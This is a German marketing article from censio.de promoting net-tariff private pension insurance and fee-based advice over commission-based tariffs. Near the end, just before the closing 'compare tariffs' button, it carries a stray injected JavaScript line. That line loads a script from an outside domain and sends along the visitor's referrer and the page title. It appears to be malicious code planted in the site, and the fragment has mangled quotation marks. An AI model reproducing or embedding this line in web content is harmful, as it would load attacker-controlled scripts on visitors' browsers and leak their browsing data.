CENSIO » Aktuell » Altersvorsorge » Private Rentenversicherung » Nettotarife Rentenversicherung

Nettotarife Rentenversicherung

Optimieren Sie Ihre Rentenversicherung durch Nettotarife!

  • Zahlreiche Nettotarife im Vergleich
  • enormes Sparpotential
  • erhöhte Rentenleistungen bzw. Rentenzahlungen
  • Transparenz ohne versteckte Kosten

Jetzt Tarife vergleichen Jetzt Tarife vergleichen

Nettotarife Rentenversicherung für eine erstklassige Altersvorsorge

Nutzen Sie eine Nettotarife Rentenversicherung, um Ihre Altersvorsorge zu optimieren. Die Altersvorsorge hat immer das gleiche Ziel. Unabhängig von Versicherer, Vorsorgeform oder Tarif, Sie sparen eine bestimmte Geldsumme an, die Ihnen zum Renteneintritt zur Verfügung stehen soll. So können Sie auch im Ruhestand Ihren gewohnten Lebensstandard halten. Abhängig vom gewählten Tarif erhalten Sie bei Ablauf einer Rentenversicherung eine monatliche Rente oder eine einmalige Kapitalsumme.

Versicherungsprodukte bieten bisher zumeist Bruttotarife an. Im Gegensatz zu einem Nettotarif fallen hier Kosten an (Bearbeitungskosten, Abschlusskosten, Provisionen, Bestandskosten…), die dem Kunden nicht gesondert aufgezeigt oder in Rechnung gestellt werden. Sie sind von Anfang an in den Beitrag eingerechnet. Kunden finanzieren diese Kosten, ohne zu wissen in welcher Höhe sie anfallen. Es spielt keine Rolle, ob eine Rentenversicherung über einen Versicherungsvertreter abgeschossen wird, oder direkt bei der Gesellschaft, die anfallenden Kosten bleiben gleich. Kunden decken die Kosten in den ersten fünf Jahren der Versicherung. Ein Teil der Beiträge wird automatisch für diesen Zweck vom Versicherer entnommen. Darüber hinaus finanziert der Kunde Verwaltungskosten und Bestandsprovisionen bis zum Vertragsende. Nicht selten ergeben diese Kosten eine hohe Summe, die dem Sparguthaben entnommen wird. Zu Beginn der Auszahlungen steht das Kapital also nicht zur Verfügung.

Nettotarife sind anders berechnet. Unter anderem wird auf die Zahlung von Provisionen für den Versicherungsvertreter verzichtet. Hinzu kommen geringere Kosten für die Verwaltung der Verträge. Der Versicherte zahlt einen Bruchteil der Kosten eines Bruttotarifes. Die Ersparnis steht dem Kunden zum Auszahlungsbeginn zur Verfügung. So erhöht sich die monatliche Rentenauszahlung der Nettotarife Rentenversicherungen.

Was ist die Nettotarife Rentenversicherung?

Ein Nettotarif Rentenversicherung erlaubt es, die Ablaufleistung zu erhöhen, ohne zusätzliche Kosten zu erzeugen. Abhängig von Vertragslaufzeit, Anbieter und Tarif entsteht eine enorme Ersparnis im Vergleich zum Bruttotarif. Ein Nettotarif arbeite nicht mit versteckten Kosten. Es wird volle Transparenz geboten und von Anfang an ist deutlich zu erkennen, welche Summe für welche Bereiche aufgewendet wird. Eine fondsgebundene Rentenversicherung im Bruttotarif hat neben den bereits genannten Kosten zusätzliche Fondskosten (Managementgebühren). Auch diese sind in einem Nettotarif geringer kalkuliert. Durch eine intelligente Fondsauswahl (ETF`s oder institutionelle Assetklassenfonds) können zusätzlich Zahlungen optimiert werden. Nutzen Sie censio.de um einen entsprechenden Tarif zu finden. Sämtliche Vorteile der Nettotarife Rentenversicherung stehen zur Verfügung, ohne dass die Leistungen der klassischen Produkte verloren gehen. Lebenslange Rentenzahlungen, gesicherte Zinssätze oder Garantiezeiten sind weiterhin gegeben.

Welche Vorteile bieten Nettotarife?

Kunden genießen einen gossen finanziellen Vorteil durch die Nettotarife. Geringe Kosten erlauben eine erhöhte Ablaufleistung. Das Einzahlungskapital wird von Beginn der Einzahlungen verzinst und die Zinsleistung erhöht sich. Das höhere Vertragsguthaben rechnet sich in eine erhöhte Rentenzahlung um. Aber nicht nur die Kostenersparnis ist ein wichtiger Vorteil der Nettotarife Rentenversicherung. Der Kunde genießt vollkommende Transparenz und eine detailliert Kostenaufschlüsselung. Sämtliche Kosten sind von Anfang ausgewiesen. Es gibt keine versteckten Kosten, die den Auszahlungsbetrag minimieren. Berater arbeiten absolut unabhängig von Versicherer und Provisionsstrukturen. Schließt ein Versicherungsvertreter einen Vertrag zum Bruttotarif ab, erhält er eine Provision. Dieses Vorgehen kann dazu führen, dass ein Vertreter ein bestimmtes Produkte verkaufen möchte, aufgrund einer höheren Zahlung. Berater empfehlen Tarife die den Ansprüchen des Kunden gerecht werden.

Ihre Vorteile der Nettotarife im Überblick:

  • geringe Kosten
  • erhöhte Abschlussleistung
  • maximaler Zinseffekt von Beginn an/li>
  • unabhängige Beratung/li>

Warum Sind Nettotarife noch so unbekannt?

Nettotarife werden von nur wenigen Versicherungsgesellschaften angeboten. Dies minimiert die Auswahl der Tarife und Produkte. Versicherungsgesellschaften und Versicherungsvertreter verlassen sich aktuell auf das bestehende Modell der klassischen und fondsgebundenen Rentenversicherungen, um das Risiko von sinkenden Abschlussraten zu umgehen. Der Grund hierfür ist unter anderem das Beratungshonorar. Der Nettotarif beinhaltet keine Vermittlungsprovision. Ein Berater berechnet für seine Leistungen einen im Vorfeld festgelegten Kostenbeitrag. Dieser beträgt lediglich einen Bruchteil der Kostensumme eines Bruttotarifes. Obwohl diese einmalige Investition auf lange Sicht eine hohe Ersparnis ermöglicht, schrecken Kunden vor der Zahlung zurück. Versicherungsvertreter wählen den Verkauf der Bruttotarife, da es einfacher ist diese den Kunden anzubieten.

Was ist der Unterschied zwischen dem Beratungshonorar und einer Provision?

Das Beratungshonorar wird als Pauschalbetrag oder Stundensatz festgelegt. Die Kosten werden vor der Beratung vereinbart. Die Beratungskosten (Honorar) werden direkt an den Berater gezahlt. Die Versicherung ist an dieser Stelle in keiner Weise involviert. Das Ziel einer guten Beratung ist es, dem Kunden einen bestmöglichen Versicherungsschutz zu erarbeiten. Der Berater ermittelt die passenden Tarife und Versicherungsprodukte. Es werden keine unnötigen Versicherungen oder minderwertige Tarife angeboten, da der Berater unabhängig von den Gesellschaften arbeitet. Es spielt für Ihn keine Rolle, für welchen Vertrag der Kunde sich entscheidet. Das Beratungshonorar liegt weit unter den Kosten, die für einen Bruttotarif anfallen. Kunden zahlen sämtliche Kosten eines Bruttotarifs aus eigener Tasche, ohne den exakten Betrag zu kennen. Das Honorar für den Berater wird ebenfalls durch den Kunden beglichen, allerdings einmalig und in bekannter Höhe. Die Kostentransparenz der Nettotarife ist ein klarer Vorteil.

Die Höhe der Kosten für eine Nettotarife Rentenversicherung werden durch verschiedene Faktoren bestimmt. Neben der gewählten Vertragslaufzeit und dem Tarif kommt auch die Beitragshöhe zum Tragen. Eine umfassende Beratung zeigt die unterschiedlichen Möglichkeiten und schlüsselt die Kosten auf. Das Beratungshonorar wird zumeist pro Stunde berechnet. Der Berater erstellt einen maßgeschneiderten Vorsorgeplan und findet passende Tarife. Weiter Kosten können anfallen, kommt es zu einem Abschluss. Dies ist von Berater zu Berater unterschiedlich, wird aber im Vorfeld festgelegt. Erfahrene Berater bieten einen erstklassigen Service und hochwertige Beratung. Setzen Sie sich mit den censio Beratern in Verbindung und profitieren Sie von langjährigen Erfahrungen.

Warum nutzen wenige Verbraucher Nettotarife?

Nettotarife Rentenversicherungen sind vielen Verbrauchern nicht bekannt. Die geringe Tarifauswahl ist dabei ein entscheidender Grund. Hinzu kommt, dass es nicht einfach ist, einen guten Honorarberater zu finden. Die Deutschen sind es gewohnt mit klassischen Bruttotarifen zu arbeiten. Trotz der hohen Ersparnis die Nettotarife bieten, schrecken die Verbraucher von den Beratungskosten zurück. Verbraucherschützer fordern die Bundesregierung immer wieder dazu auf, die Bruttotarife zu verbieten. Ein entsprechendes Gesetzt würde jedem Verbraucher die Möglichkeit bieten die finanziellen Vorteile der Nettotarife in Anspruch zu nehmen.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Jetzt Tarife vergleichen Jetzt Tarife vergleichen

Weiterführende Artikel:

Autor: censio.de am 18. Mai 2015 12:39, Rubrik: Private Rentenversicherung, Kommentare geschlossen.

nach oben